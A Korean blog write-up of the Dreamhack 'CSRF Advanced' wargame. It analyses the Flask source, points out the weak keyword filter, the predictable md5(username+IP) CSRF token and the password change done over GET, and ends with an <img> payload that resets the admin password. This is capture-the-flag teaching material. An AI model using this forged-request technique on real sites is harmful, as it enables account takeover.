반응형

문제 설명

Exercise: CSRF Advanced에서 실습하는 문제입니다.

코드 분석

users = {
    'guest': 'guest',
    'admin': FLAG
}
  • ID: guest, PW: guest
  • ID: admin, PW: FLAG
session_storage = {}
token_storage = {}
  • 세션과 토큰 저장소
def check_csrf(param, cookie={"name": "name", "value": "value"}):
    url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
    return read_url(url, cookie)
  • 로컬 URL 구성해 read_url 호출
@app.route("/")
def index():
    session_id = request.cookies.get('sessionid', None)
    try:
        username = session_storage[session_id]
    except KeyError:
        return render_template('index.html', text='please login')

    return render_template('index.html', text=f'Hello {username}, {"flag is " + FLAG if username == "admin" else "you are not an admin"}')
  • sesionid는 쿠키가 있으면 가져오고 없으면 None / Flask가 request.cookies는 쿠키들을 딕셔너리처럼 모아둔 객체
  • username은 session_storeage에 있는 session_id값 보고 판단
  • username이 admin이면 flag출력
@app.route("/vuln")
def vuln():
    param = request.args.get("param", "").lower()
    xss_filter = ["frame", "script", "on"]
    for _ in xss_filter:
        param = param.replace(_, "*")
    return param
  • param은 URL에서 입력받고 소문자로 처리
  • frame, script, on 문자열 필터링 해서 "*"로 처리
@app.route("/flag", methods=["GET", "POST"])
def flag():
    if request.method == "GET":
        return render_template("flag.html")
    elif request.method == "POST":
        param = request.form.get("param", "")
        if not check_csrf(param):
            return '<script>alert("wrong??");history.go(-1);</script>'

        return '<script>alert("good");history.go(-1);</script>'
  • /flag은 GET/POST메소드 다르게 처리
  • GET
    • flag.html 템플릿 렌더링
  • POST
    • param은 사용자로부터 입력받고, check_csrf로 검증 후, good, wrong 처리
@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'GET':
        return render_template('login.html')
    elif request.method == 'POST':
        username = request.form.get('username')
        password = request.form.get('password')
        try:
            pw = users[username]
        except:
            return '<script>alert("user not found");history.go(-1);</script>'
        if pw == password:
            resp = make_response(redirect(url_for('index')) )
            session_id = os.urandom(8).hex()
            session_storage[session_id] = username
            token_storage[session_id] = md5((username + request.remote_addr).encode()).hexdigest()
            resp.set_cookie('sessionid', session_id)
            return resp 
        return '<script>alert("wrong password");history.go(-1);</script>'
  • GET/POST메소드 다르게 처리
  • GET
    • login.html 템플릿 렌더링
  • POST
    • username과 password는 사용자로부터 입력받음
    • pw는 users의 username값
    • pw와 맞으면 sessionid 랜덤 8바이트 hex
    • 토큰은 md5(username + request.remote_addr)
    • 응답에 쿠키를 시고 이름은 sessionid, 값은 session_id
@app.route("/change_password")
def change_password():
    session_id = request.cookies.get('sessionid', None)
    try:
        username = session_storage[session_id]
        csrf_token = token_storage[session_id]
    except KeyError:
        return render_template('index.html', text='please login')
    pw = request.args.get("pw", None)
    if pw == None:
        return render_template('change_password.html', csrf_token=csrf_token)
    else:
        if csrf_token != request.args.get("csrftoken", ""):
            return '<script>alert("wrong csrf token");history.go(-1);</script>'
        users[username] = pw
        return '<script>alert("Done");history.go(-1);</script>'
  • session_id로 어떤 유저인지 찾고 CSRF 토큰을 꺼냄
  • URL 쿼리 스트링에서 pw값 있으면 가져오고 없으면 None
  • pw 있으면 csrftoken 검사. 틀리면 에러, 맞으면 users[name] = pw로 비밀번호 변경 

취약점 분석

  • 스크립트가 특정 문자열만 필터링 되어 있음 frame, script, on
  • token이 부실함 admin + 127.0.0.1 이런식으로 가능..
  • /change_password는 GET 요청으로 비밀번호 변경이 가능함
driver.find_element(by=By.NAME, value="username").send_keys("admin")
driver.find_element(by=By.NAME, value="password").send_keys(users["admin"])
driver.find_element(by=By.NAME, value="submit").click()
  • username 필드에 admin / password 필드에 users["admin"] 입력, submit 클릭
  • 봇은 admin 세션을 만든 뒤에 우리가 넘긴 URL을 방문함

익스플로잇

봇 IP = 127.0.0.1

CSRF 토큰 = md5(admin+127.0.0.1)

값 = admin127.0.0.1을 md5해시 값으로 하면 "7505b9c72ab4aa94b1a4ed7b207b67fb" 이다.

<img src="http://127.0.0.1:8000/change_password?pw=1234&csrftoken=7505b9c72ab4aa94b1a4ed7b207b67fb">
  • admin의 비밀번호가 1234로 변경됨

 

 

반응형

'Dreamhack 워게임 > Lv.1' 카테고리의 다른 글

simple-ssti  (0) 2026.01.30
simple_sqli chatgpt  (0) 2026.01.30
XSS Filtering Bypass  (0) 2026.01.21
{"role": "admin"}  (0) 2026.01.21
simple_sqli  (1) 2026.01.15

티스토리툴바